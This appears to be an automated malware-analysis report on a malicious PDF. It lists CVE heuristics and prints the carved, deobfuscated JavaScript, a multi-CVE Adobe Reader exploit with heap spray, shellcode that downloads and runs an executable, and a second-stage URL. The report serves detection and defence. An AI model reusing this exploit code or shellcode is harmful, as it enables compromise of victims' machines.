Verdict: MALICIOUS
Risk Score: 468
Malware Insights
MITRE ATT&CK
- T1059.007 JavaScript
- T1203 Exploitation for Client Execution
- T1566.001 Spearphishing Attachment
This PDF document contains embedded JavaScript that exploits multiple CVEs in Adobe Reader, including CVE-2009-4324, CVE-2009-0927, and CVE-2008-2992. The script is designed to download and execute a second-stage payload from the URL http://ahrudk.egh/4. The obfuscated JavaScript and the use of multiple exploit techniques indicate malicious intent to compromise the user's system.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 10
- media.newPlayer — CVE-2009-4324 (critical; CVE exact; CVE_2009_4324): PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
- Collab.getIcon — CVE-2009-0927 (critical; CVE exact; CVE_2009_0927): PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
- util.printf — CVE-2008-2992 (critical; CVE exact; CVE_2008_2992): PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
- Pidief-style multi-CVE JavaScript dispatcher (critical; CVE likely; PDF_PIDIEF_MULTI_CVE_DISPATCH): A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
- Multi-CVE Adobe Reader JavaScript exploit kit (critical; PDF_ADOBE_READER_MULTI_CVE_JS_KIT): One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
- JavaScript action (low; 2 related findings; PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical; PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  Matched line in script: { return 'var 77rCL = 7158 ;var nEJ = thi77s;Jv7arJ7 mL=J\'getPa\'7+\'geNthW\'7+\'JJoJ7rd\';var JvK=\'getP\'+\'ageNu77\'+\'JJmWor\'+\'ds\';7Jvar gRJ=\'f7rom\'+\'CharCo\'7+\'dJe\'J7;var7 pG=\'pag7JeN\'+\'um\';JJvar iBA=nE[J7vJJK]J(nJJE[pG]);vaJ7r77 mB77=7J\'\';forJ(var tU7V=0;tUV7< J7iBA; tUV++){mB=[mB,nE[mL](nJ7E[pG],tUV,t7Jrue)]JJ.joiJn(\'\')7;7;7}var 7lK=\'\';77for(7vJar tUV=0;t77UV < mB.leng7th; tUV+=2J7){j77Q7J=mB.JsubstrJ7(tUVJ,277);lK=[lK,Str7in77g[gRJ]J(Jparse7Int(j7Q,1J67)^J7rCL)]77.joiJn( … }
- Embedded JS stream (low; PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (medium; EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL http://ahrudk.egh/4 (referenced by PDF JavaScript)
Extracted artifacts 2
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| javascript_obj0011_000.js | pdf-javascript-stream | PDF /JS object 11 at offset 0xFBF | 738 bytes | d61d482c6433952270c36196ace48df73af3643d59a9d9f3780f823e0255291f |
| legacy_pdfkit_stage_000.js | deobfuscated-js | getPageWords-XOR Pidief stage normalized at offset 0x0 | 4863 bytes | b058d22f740c2d5f74f69bd8a0698585a6968168aeaf8d0a1db8cec4303f85b7 |

javascript_obj0011_000.js
Detection
ClamAV: No threats found
Obfuscation or payload: likely. Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script (first 1,000 lines of the extracted script):
bA=waitForBody();
var wPI=focusCommandLine();
var iX=new this[wPI](bA);
function focusCommandLine(){
return 'FuncGtGGion'.replace(/[G]/g, '');
}
function waitForBody()
{
return 'var 77rCL = 7158 ;var nEJ = thi77s;Jv7arJ7 mL=J\'getPa\'7+\'geNthW\'7+\'JJoJ7rd\';var JvK=\'getP\'+\'ageNu77\'+\'JJmWor\'+\'ds\';7Jvar gRJ=\'f7rom\'+\'CharCo\'7+\'dJe\'J7;var7 pG=\'pag7JeN\'+\'um\';JJvar iBA=nE[J7vJJK]J(nJJE[pG]);vaJ7r77 mB77=7J\'\';forJ(var tU7V=0;tUV7< J7iBA; tUV++){mB=[mB,nE[mL](nJ7E[pG],tUV,t7Jrue)]JJ.joiJn(\'\')7;7;7}var 7lK=\'\';77for(7vJar tUV=0;t77UV < mB.leng7th; tUV+=2J7){j77Q7J=mB.JsubstrJ7(tUVJ,277);lK=[lK,Str7in77g[gRJ]J(Jparse7Int(j7Q,1J67)^J7rCL)]77.joiJn(\'\');}eval(lK77);lK=null;'.replace(/[7J]/g, '');
}
iX();
legacy_pdfkit_stage_000.js
Kind: deobfuscated-js; Source: getPageWords-XOR Pidief stage normalized at offset 0x0; Size: 4863 bytes
SHA-256: b058d22f740c2d5f74f69bd8a0698585a6968168aeaf8d0a1db8cec4303f85b7
Detection
ClamAV: No threats found
Obfuscation or payload: likely. Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long hex-escaped blob(s).
Preview script (first 1,000 lines of the extracted script):
v={h:30626};sB={};var yT='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#';try {var hM='tU'.substring(26727)} catch(hM){};try {var hU='oP'.substring(5107)} catch(hU){};var d=this.info['t'].replace(/[\s]/g, '');var xK="xK";try {var lA='sBM'.substr(14201,14201)} catch(lA){};try {var jI='yL'.substr(12965,12965)} catch(jI){};var tUP = this.info;var lUP = (tUP.producer.substr(0,5) == 'debug');var z = new Array(); var xI = "%u";function gV(str){str = str.split(xI);var ret="";for(var i in str){if(str[i] != "")ret += String.fromCharCode(parseInt(str[i],16));}return ret;}function zI(str1, str2){return [str1, str2].join("");}function iZ(tUZ){var vS = cH();var f = p();vS += ((vS.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + f;if(lUP) app.alert("URL: " + vS);var d=xI;var jQ="\x50\x53\x51\x52\x56\x57\x55\x9C\xE8\x00\x00\x00\x00\x5D\x83\xED\x0D\x31\xC0\x64\x03\x40\x30\x78\x10\x8B\x40\x0C\x8B\x70\x14\xAD\x89\xC0\x89\xC0\x8B\x40\x10\xEB\x09\x8B\x40\x34\x8D\x40\x7C\x8B\x40\x3C\x56\x57\xBE\xE2\x00\x00\x00\x01\xEE\xBF\xD2\x00\x00\x00\x01\xEF\xE8\x56\x01\x00\x00\x5F\x5E\x89\xEA\x81\xC2\xE2\x00\x00\x00\x52\x68\x80\x00\x00\x00\xFF\x95\xD2\x00\x00\x00\x89\xEA\x81\xC2\xE2\x00\x00\x00\x31\xF6\x01\xC2\x8A\x9C\x35\xE7\x01\x00\x00\x80\xFB\x00\x74\x06\x88\x1C\x32\x46\xEB\xEE\xC6\x04\x32\x00\x89\xEA\x81\xC2\xC9\x01\x00\x00\x52\xFF\x95\xD6\x00\x00\x00\x89\xEA\x81\xC2\xD4\x01\x00\x00\x52\x50\xFF\x95\xDA\x00\x00\x00\x6A\x00\x6A\x00\x89\xEA\x81\xC2\xE2\x00\x00\x00\x52\x89\xEA\x81\xC2\xF4\x01\x00\x00\x52\x6A\x00\xFF\xD0\x6A\x05\x89\xEA\x81\xC2\xE2\x00\x00\x00\x52\xFF\x95\xDE\x00\x00\x00\x9D\x5D\x5F\x5E\x5A\x59\x5B\x58\xC3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x47\x65\x74\x54\x65\x6D\x70\x50\x61\x74\x68\x41\x00\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x00\x57\x69\x6E\x45\x78\x65\x63\x00\xBB\x89\xF2\x89\xF7\x30\xC0\xAE\x75\xFD\x29\xF7\x89\xF9\x31\xC0\xBE\x3C\x00\x00\x00\x03\xB5\
x9F\x01\x00\x00\x66\xAD\x03\x85\x9F\x01\x00\x00\x8B\x70\x78\x83\xC6\x1C\x03\xB5\x9F\x01\x00\x00\x8D\xBD\xA3\x01\x00\x00\xAD\x03\x85\x9F\x01\x00\x00\xAB\xAD\x03\x85\x9F\x01\x00\x00\x50\xAB\xAD\x03\x85\x9F\x01\x00\x00\xAB\x5E\x31\xDB\xAD\x56\x03\x85\x9F\x01\x00\x00\x89\xC6\x89\xD7\x51\xFC\xF3\xA6\x59\x74\x04\x5E\x43\xEB\xE9\x5E\x93\xD1\xE0\x03\x85\xAB\x01\x00\x00\x31\xF6\x96\x66\xAD\xC1\xE0\x02\x03\x85\xA3\x01\x00\x00\x89\xC6\xAD\x03\x85\x9F\x01\x00\x00\xC3\xEB\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x89\x85\x9F\x01\x00\x00\x56\x57\xE8\x58\xFF\xFF\xFF\x5F\x5E\xAB\x01\xCE\x80\x3E\xBB\x74\x02\xEB\xED\xC3\x55\x52\x4C\x4D\x4F\x4E\x2E\x44\x4C\x4C\x00\x55\x52\x4C\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x54\x6F\x46\x69\x6C\x65\x41\x00\x31\x32\x33\x34\x35\x36\x37\x38\x2E\x65\x78\x65\x00";jQ+=vS;jQ+="\x00\x90";return jQ;};function cH(){var kZ = (tUP.author + tUP.title).replace(/[\s]/g, '');var rC = eF(kZ, d, yT);return rC;};function eF(kZ, yT, d){var rC="";for(var i=0; i < kZ.length; i++){var vIR = yT.indexOf(kZ[i]);if(vIR > -1 ){rC += d[vIR];}}return rC;};function zG(kZ){var out = "";kZ = mJ(kZ);g = Math.round(kZ.length / 4);if (g != kZ.length /4) kZ+="00";for(var i=0; i < kZ.length; i+=4){out+= xI + kZ.substr(i+2, 2) + kZ.substr(i, 2);}return out;};function mJ(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function vUR(xM, len){while (xM.length * 2 < len){xM = zI(xM, xM);}return xM.substring(0, len / 2);};function cB(lC){var kL = 0x0c0c0c0c; pM = iZ("pdf");if (lC == 1){kL = 0x30303030;}var sJ = 0x400000;var ln = pM.length * 2;var vY = sJ - (ln + 0x38);var xM = gV(xI+"9090"+xI+"9090"); xM = vUR(xM, vY);var uL = (kL - 0x400000) / sJ;for (var nM = 0; nM < uL; nM ++ ){z[nM] = zI(xM, pM);}};function p(){try {return app.viewerVersion.toString();}catch(aHE){ return 0;}}if(lUP) app.alert("called exploit");var f = p();if(lUP) app.alert("v: " + 
f);if (f > 8){if(lUP) app.alert("util.printf");cB(1);var eH = "12999999999999999999";for (nW=0; nW < 276; nW++) eH += "8";util.printf("%45000f", eH);}if (f < 8){if(lUP) app.alert("Collab.collectEmailInfo");cB(0);var wH = gV(xI+"0c0c"+xI+"0c0c");while (wH.length < 44952) wH += wH;this.collabStore = Collab.collectEmailInfo({ subj : "", msg : wH});}if (f < 9.1){if (app.doc.Collab.getIcon){if(lUP) app.alert("Collab.getIcon");cB(0);var pS = unescape("%09");while (pS.length < 0x4000) pS += pS;pS = "N." + pS;app.doc.Collab.getIcon(pS);}}if (f == 9.2){if(lUP) app.alert("media.newPlayer");cB(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {}util.printd(sf, new Date());}var nC=["gT","vC","iB"];this.b=13612;this.b++;try {var eL='jM'} catch(eL){};var r=[];